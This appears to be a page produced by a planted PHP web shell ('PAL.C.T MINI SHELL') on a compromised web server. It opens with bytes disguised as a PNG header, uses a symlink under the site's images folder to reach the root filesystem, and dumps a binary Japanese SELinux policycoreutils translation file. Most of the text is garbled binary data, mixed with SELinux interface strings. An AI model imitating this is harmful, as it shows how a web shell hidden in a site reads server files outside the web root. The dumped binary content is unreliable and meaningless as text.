‰php  IHDRwQ)Bæa pHYs  šœsRGB®ÎégAMA± üaÔIDATxíÜMk\UÇás&uo,ÖmÄD )XwîŒ+Çe?‰ºtw.“oàWpå§;—³°QHZnw¢`gaiJ’9Þˆ‰ÑÒ̟灙ûŸýÍaî=·nlŽ[ ÊšG܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îúž·y H†¯@E7j­Í 1j+OF¥–€‹Rg}Ü«‘;@’E™Öa¹±ùáÓ~ ÿj`Ùuû'ož> ÙjÝ-$˜_§q?ŸqžSXzG'åóay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ja/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ja/LC_MESSAGES/policycoreutils.mo

Þ•¢,‹<*h8i8}8‘8¬8Œ8?Ó8;9&O99v9°99Í97:?:C:L:`:s:…:”:¥:¶:º:Á:Õ:æ:÷:;+;<;U;/^;Ž;¥;«;»;G¿;E<$M<)r<Mœ<5ê<) =lJ=)·=á=2ÿ=L2>K>Ë>"ç>
?(?!G?'i?D‘?BÖ?Š@A€@æ@4A&7A,^A%‹A2±AäAKB5MBTƒB<ØBLC(bC,‹CPžC2	D.<DJkD%¶D(ÜD4E:E]VECŽE(øE²!F$ÔFùF%G-=GLkGxžG1H(=HfHH2‡HºHÔHáH2åH#I1<I2nI¡I »I"ÜIºÿI†ºJœAL
ÿL
MMP&MwM•M!«MÍM"èMN$NCN-`N%ŽN(ŽN1ÝN*O2:O(mO–O%ŽO$ÚOÿO P>P[P"{P$žP!ÃPåP%Q'Q GQ hQ‰Q¢Q$ŸQãQ%R'R$CRhR$…R'ªRÒRïRS+S@SXSuS"S²SÐS åS T'T @TaTzT$–T»T%ÙTÿTU3UKU#kUU¬UÇUåU5V7VVV!uV(—V!ÀV"âV!W&'WNW$hW/W/œW4íW2"XUX?oX$¯X)ÔX)þX.(Y,WY)„Y)®Y.ØY,Z)4Z)^Z.ˆZ,·Z$äZ!	[+[)G[q[v[
[˜[	«[	µ[¿[Ó[ç[\\
\-)\(W\)€\2ª\2Ý\-]*>]*i]%”]%º]*à].^,:^/g^$—^/Œ^+ì^-_+F_+r_'ž_$Æ_,ë_-`0F`.w`+Š`0Ò`4a+8a(da)a+·a,ãa+b#<b%`b#†b)ªb,Ôb+c+-c+Yc-…c+³c-ßc-
d.;d(jd-“d/Ád.ñd$ e)Ee)oe.™e-Èe*öe*!f/Lf-|f*ªf.Õf2g+7g*cg.Žg*œg0èg+h-Eh-sh+¡h-Íh,ûh+(i,Ti)i*«i)Öi&j+'j,Sj*€j,«j,Øj+k-1k*_k*Šk*µk*àk)l*5l%`l/†l-¶l)äl&m/5m-em/“m&Ãm0êm#n-?n-mn*›n)Æn%ðn+o-Bo+po$œo(Áo*êo*p$@p0ep-–p*Äp#ïp+q/?q3oq.£q&Òq4ùq+.r.Zr*‰r+Žr+àr+s,8s+es/‘s+Ás)ís-t*Et*pt-›t/Ét)ùt,#u+Pu/|u0¬u*Ýu)v.2v-av+v,»v.èv-w)Ew*ow)šw)Äw,îw,xHxQx1px:¢x9ÝxNyfyxyW…y	Ýy2çyJz<ez¢z ŒzÝz"üz+{&K{r{+†{#²{Ö{!ô{%|<|X|!u| —| ž|FÙ|
 }+}
?}M}k}	~}ˆ}
›}©}	Œ};Æ}"~%~,~0~6~
Q~
\~j~v~4’~Ç~ã~ ò~6Jenw•	²ŒÏâ
îù
€<€#X€	|€	†€€”€™€
š€
¶€Āրñ€	
+G%SGyÁ́Ӂׁہàí‚‚'‚@‚Y‚m‚‚	‚
™‚€‚«‚
Œ‚ʂς2ꂃ7ƒCƒ8Tƒ8ƒƃ̓փåƒëƒôƒ„!„9„W„v„&„¶„Ƅ"á„…(…H…M…b……š…§…Ÿ…Ѕï…†
†!†<†I†b†o††:†7ˆ‡"‡@‡D‡J‡c‡¬p‡,ˆFJˆ&‘ˆ:žˆïóˆ'ã‰<ŠGHАŠ(¢Š$ˊðŠ‹‹0‹5O‹6…‹Œ‹̋ҋqç‹YŒ`Œ~Œ|›Œ‘,ª*׍'Ž.*Ž3YŽ4Ž2Ž4õŽE*p†’—'*)R|"™,Œé	‘'‘<‘X‘q‘}‘‘‘Š‘Ÿ‘*ܑ’'"’'J’r’]ƒ’á’
î’	ù’r“Uv“̓	è“ò“””.$”*S”~”›”L¬”ù”••%•C•4_•<”•ѕ0è•–!–-–_1–‘–,©–4֖#—,/—(\—(…—®—"ėç—˜˜9˜P˜l˜‡˜¢˜À˜ǘϘטߘç˜ï˜÷˜ÿ˜"™*™#G™7k™£™§™ª™¯™$µ™ڙ𙚚š#"š”Fšۛ"û›7œVœ7sœ…«œ†1GžSž2TžN‡ž4֞ŸŸŸ8ŸXŸqŸ€Ÿ•ŸªŸ±Ÿ'ŸŸ'æŸ$ ,3 ,`  ,« Ø Uî .D¡	s¡}¡œ¡l£¡r¢Dƒ¢GÈ¢|£b£Qð£šB€HÝ€D&¥Sk¥™¿¥œYŠ)öŠQ §Hr§,»§<è§D%šmjšiØšºB©\ý©4ZªHªEت?«G^«UŠ«5ü«Ÿ2¬fÒ¬‰9­gí™+®?Å®P¯«V¯Z°N]°Ÿ¬°@L±F±jÔ±*?²j²sû²Co³³³CÐŽ5µGJµF’µ™Ùµšs¶·0'·&X··N’·)á·ž!žA%ž!gžM‰ž^מ+6¹5b¹9˜¹ñÒ¹ãĺ회	–œ œžœPËœ9Ÿ1VŸEˆŸ=ΟB¿1O¿A¿5ÿRù¿ILÀD–À]ÛÀU9ÁZÁIêÁ=4ÂHrÂ<»Â-øÂ0&Ã3WÃ9‹Ã<ÅÃEÄ?HÄ-ˆÄB¶Ä3ùÄ6-Å9dÅ1žÅ,ÐÅEýÅ=CÆBÆ1ÄÆCöÆ.:Ç4iÇ0žÇ-ÏÇAýÇ>?È6~È2µÈHèÈB1ÉTtÉEÉÉ3ÊCCÊE‡Ê0ÍÊ9þÊ18Ë,jËE—Ë=ÝËBÌ1^Ì,Ì4œÌIòÌK<ÍCˆÍ7ÌÍ5Î9:ÎLtÎ5ÁÎ2÷Î<*ÏDgÏE¬ÏCòÏE6ÐQ|Ð0ÎÐHÿÐ\HÑ\¥ÑhÒ\kÒ-ÈÒgöÒE^ÓQ€ÓQöÓ]HÔQŠÔQøÔQJÕ]œÕQúÕTLÖT¡Ö`öÖTW×B¬×@ï×=0Ø:nةخØÇØרõØÙ'Ù$=Ù,bُ٥٬ÙBÅÙ1Ú7:ÚFrÚ=¹Ú6÷Ú3.Û8bÛ.›Û.ÊÛ8ùÛ<2Ü:oÜ=ªÜ-èÜ=Ý9TÝ;ŽÝ9ÊÝ9Þ0>Þ-oÞ:Þ;ØÞ>ß<Sß9ß>ÊßK	à9Uà1à7Áà9ùà:3á9ná,šá.Õá,â71â:iâ9€â9Þâ9ã;Rã9Žã;Èã;ä<@ä1}ä;¯ä=ëä<)å0få7—å7Ïå<æ;Dæ8€æ3¹æ9íæ;'ç8cç<œç<Ùç9è8Pè<‰è8Æè>ÿè9>é;xé;Žé9ðé;*ê9fê9 ê:Úê7ë8Më7†ë/Ÿë9îë:(ì8cì:œì:×ì9í;Lí8ˆí8Áí8úí83î7lî8€î.Ýî8ï;Eï7ï/¹ï=éï;'ð=cð/¡ð>Ñð,ñ;=ñ;yñ8µñ7îñ.&ò9Uò;ò9Ëò-ó-3ó3aó8•ó-Îó9üó;6ô8rô,«ô9Øô=õAPõ<’õ/ÏõBÿõ9Bö<|ö8¹ö9òö9,÷9f÷: ÷9Û÷=ø9Sø7ø;Åø8ù8:ù;sùB¯ù7òù:*ú9eú?Ÿú>ßú8û7Wû<û;Ìû9ü:Bü<}ü;ºü7öü3.ý7bý7šý:Òý:
þHþOþZeþ]ÀþHÿ„gÿ$ìÿd*K–‡âWj@ÂG;KC‡GËC'W@CÀF@K=Œ-ÊLø9E99¹cóWj‰)€Îâ*ù$@SgiBÑ$	('2Zm€™_ž:	$S	5x	b®	
-
=
1M
1
±
'Ÿ
'æ
$!5Wcg?Ë

$(-=O^0n,ŸÌ'Ù,
.
0D
mu
ã
ö
%>8Z$“*ž$ã.%Tel!s•	±4»Sð.DsƒRœbïRho	ˆ’+¢ÎÛ<ú070hW™ñ"B+(n<—	Ô Þ5ÿ5Mb t#•¹Õð /Peur†Zù6T)‹µ¹!¿$á`
‡n<ö{3P¯BQCW•í?<K*ˆ!³ÕWëXCYœö¥(Î-Õ5Ê9Ü [á ?=!3}!K±!Wý!QU"W§"Qÿ"`Q#-²#à#Äù#7Ÿ$Bö$9%4Y%1Ž%)À%/ê%&'2&*Z&…&•& µ&#Ö&)ú&6$'&['3‚'P¶'$(„,(±(Í(à(ºö(б)<*\*2t*§*·*8Ç*B+7C+!{+‚+& ,G,K,IZ,6€,UÛ,]1-0-@À-...˜&.¿.Gß.4'/#\/>€/J¿/I
0(T04}0=²0.ð0&1'F12n15¡15×1(
262F2N2V2^2f2n2v2~2)†2"°27Ó2E3Q3X3_3d38j3£3€¹3	^4h4o48…4N²k	je¡‹€~a•!ÅlÀ@–„1í…ñC†ãšIôc&µjh'2,äó;<ôñB€(0ˆ°F]ûŽ4¶pšo%=vsì(9Ìžêõ/l{ˆðy³%bC¥1i–Žä’²CX:—Ú$%Õšõ|f©fTHŒKÁ€@±7šIQٿԆ
·ϘGHÐ
)ŸŒÔŽs“ïþ·)W¹­Ó…¢&Á›ê3„›ª™m.žûDüIƒ]T"ÒÀv««ÈAІh5 ú6×6Føœ
Ša
Ék™Ñ8ߎ0ü¶uu|®RY'*ðÌ$4zŠO„eÏâ !¯màG¹8b‘èeçéZq^¢–w°S!ŸŸ|YZ‹
s®JzKi5ž¢òk‰O( ÍÖÿîÛ-
ÍGªwÝ*Å.‰÷VUýÑÖÿEì>µ¬Õ;ºJczÛV¡ú-}‘=E³\òPY-öΜ+Ç{˜P1ž$œp¡à<Æd…ÒX,¥RÉg¿»2t§[¯™rqUïž`×g<@j^QwÜœ‚S_J+£ŠŒ}yFxÇqÃyD	áBš ?xr0i~nŒŠ_MaK”.Tlù~v>ŽSnŒÞø:UÆf”‚ƒA +rNön“3B‰_å[9’)˟×`‹"d£EÙRW]LOæ•Äå5‘gÓ8?ë€Äpt\*þç`ŸØbÜŠ»hãH“­>ßýc3NÞ©[œæ‡xuØ?ë}6#§DM2Z›QP˜”o#M‚#ÈA÷èˆdí’€'4¬oáÂݱù/=/^ 7\	Wîó,":‡ÊLt—ÎVX;•ƒmÚ&L{Ë7âʇéº9%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: ja
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-07-28 10:52+0900
Last-Translator: Kiyoto Hashida <khashida@redhat.com>
Language-Team: Japanese <jp@li.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: ja
X-Generator: KBabel 1.11.4
Plural-Forms: Plural-Forms: nplurals=2; plural=(n!=1);


%s 倉曎されたラベル。
%s はすでに %s にありたす%s は有効なコンテキストではありたせん
%s は %s にありたせん%s  はディレクトリでなければなりたせん%s! %s の珟圚のコンテキストを取埗できたせんでした、再ラベルを行っおいる tty ではありたせん。
%s! %s の新しいコンテキストを取埗できたせんでした、 再ラベルを行っおいる tty ではありたせん。
%s! %s の新しいコンテキストを蚭定できたせんでした
%s:  芁求されたポリシヌず匷制モヌドをロヌド出来たせん:  %s
%s:  ポリシヌをロヌドできたせん:  %s
%s:  ポリシヌはすでにロヌド枈みで初期ロヌドが必芁です
******************** 重芁 ***********************
